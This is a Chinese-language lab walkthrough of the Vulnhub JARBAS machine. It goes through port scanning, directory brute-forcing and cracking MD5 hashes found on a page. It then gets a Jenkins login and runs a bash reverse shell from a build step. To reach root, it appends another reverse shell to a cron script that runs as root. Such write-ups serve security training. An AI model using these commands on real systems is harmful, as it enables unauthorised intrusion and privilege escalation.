Vulnhub靶机实操笔记-JARBAS
涉及知识内容:目录扫描、Hash-identifier识别、Jenkins利用、计划任务内网提权
sudo nmap -sn 192.168.32.0/24
以不低于1w的速度快速扫描端口
sudo nmap --min-rate 10000 -p- 192.168.32.135
使用TCP和UDP的形式对扫出的端口进行协议的查看
sudo nmap -sT -sV -O -p22,80,3306,8080 192.168.32.135
sudo nmap -sU -p22,80,3306,8080 192.168.32.135
sudo nmap --script=vuln -p22,80,3306,8080 192.168.32.135
访问80端口到WEB页面
访问8080端口来到了登陆页面
先对80端口目录爆破
sudo gobuster dir -u http://192.168.32.135 -x txt,jsp,php,zip,sql,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
访问扫描到的access.html提示这是一个安全的凭据,我们吧这些拿去识别解密一下
当不知道当前hash编码方式是什么时可以利用hash-identifier
hash-identifier '带检测编码'
hash-identifier '5978a63b4654c73c60fa24f836386d87'
hash-identifier 'f463f63616cb3f1e81ce46b39f882fd5'
hash-identifier '9b38e2b1e8b12f426b0d208a7ab6cb98'
通过在线md5解密网站解出来了对应的值,谷歌浏览器搜md5 crack
对“:”后面的编码进行解密
https://hashes.com/zh/decrypt/hash
通过前面解密得到的密码,尝试账户密码的登陆爆破尝试
最终eder/vipsu登陆系统
选择freestyle project
下拉菜单第一项,执行windows批处理命令;第二项执行shell
选择第二项执行shell,并写入shell命令
/bin/bash -i >& /dev/tcp/192.168.32.131/1234 0>&1
点击build now执行项目
uname -a #显示系统名、节点名称、操作系统的发行版号、内核版本等等
sudo -l
从结果来看用户是没有任何权限的
cat /etc/passwd
cat /etc/shadow
cat /etc/crontab #较为常用
cat /etc/cron.d #比较少用
可以看到箭头处,每五分钟以root的权限去执行CleaningScript.sh这个shell脚本,执行结果是将所有结果丢掉
cat /etc/script/CleaningScript.sh #查看脚本内容
ls -lia /etc/script/CleaningScript.sh #查看对sh文件的权限
echo "/bin/bash -i >& /dev/tcp/192.168.32.131/4443 0>&1" >> /etc/script/CleaningScript.sh
#续写文件CleaningScript.sh将反弹shell命令续写入计划任务脚本内
查看ssh是否允许远程登录/etc/ssh/sshd_config,查找 #PermitRootLogin 行,如果想允许 root 用户远程登录,将该行的注释符号 # 去掉,并将参数设置为 yes,即 PermitRootLogin yes。如果想禁止 root 用户远程登录,将参数设置为 no,即 PermitRootLogin no。
/etc/ssh/sshd_config
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。